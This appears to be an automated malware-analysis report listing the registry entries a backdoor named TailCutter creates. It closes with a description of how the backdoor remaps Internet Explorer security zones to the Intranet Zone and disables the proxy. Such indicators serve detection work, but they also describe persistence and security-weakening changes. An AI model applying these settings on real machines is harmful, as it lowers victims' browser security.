[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "/P////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"bbf88800" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"27ddcf6f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"3c09c42b" = "///%"
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f0bf0bde" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"414bc593" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"
"c6c5dd44" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"48bd1aff" = "V/////%%"
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"27ddcf6f" = "///%"
"72758a5d" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d1abcdb6" = "///%"
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c5705860" = "Vx////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"iiid" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB D9 BC F2 72 8D E9 64 75 E5 45 0A 51 D4 15 46"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svn" = "TailCutter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svi" = "0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0c230bcb" = "///%"
"587b5709" = "V/////%%"
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"dlpath" = "c:\progra~1\tailcu~1\tailcu~1.dll"
"svx" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1520c6f1" = "V/////%%"
"0c230bcb" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c6c5dd44" = "V/////%%"
"e46c271e" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"3efeb33e" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"2e22d94e" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"usr.1" = "6t1JF1FHwysurpnikg"
"usr.0" = "oMUlaLmjlhabcdefAB"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"8b9e4cbc" = "V/////%%"
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
"a1dcff5b" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"c6d15ff2" = "%Program Files%\TailCutter\TailCutter.dll"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"date" = "1431212812"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"uuid" = "12802899647634509424"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
"a2e3b941" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"LRTS" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"bbf88800" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"3efeb33e" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\00000000]
"370856c7" = ""
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Install_Dir" = "%Program Files%\TailCutter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svn" = "TailCutter"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svi" = "0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1520c6f1" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svt" = "1431212851"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"InstallDate" = "20140510"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svpath" = "c:\Program Files\TailCutter\TailCutter.dll"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"svx" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"uuid" = "12802899647634509424"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"CategoryName" = "%SearchDefenderUpdaterKeys_CategoryName%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Mode" = "4026531840"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Version" = "22022131"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0c230bcb" = "///%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"51d2f2ea" = "PPAf/Xh/alAf/XJ/bxAR/Xt/blAu////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"Mode" = "4026531840"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"usr.0" = "oMUlaLmjlhabcdefAB"
"usr.1" = "6t1JF1FHwysurpnikg"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"date" = "1431212812"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"d1abcdb6" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
"data.0" = "fQF57HURyKoR6NefABI323TfrInxahwIOp5StaeAJBCyfDq7Erg4vykYteGDGGdVQ5vnjyVEz9 BA4 T dKPgoj fH5VefCFef"
"data.1" = "zgDqmec5BqIcJ34567VpLFBdD0Q CDfDf0VrwRgwHh9IrFMQ PK5Il0Qkzg4GEjjIhqvIcHWktX2E1a99iwXBcSv2uoTlk6TCIS4DlnNZTKM9fIyaJFQ g"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"340d3099" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"7367429f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"svt" = "1431212851"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"414bc593" = "///%"
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"LRTS" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"Version" = "22022131"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"fe94ce1e" = "V/////%%"
The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
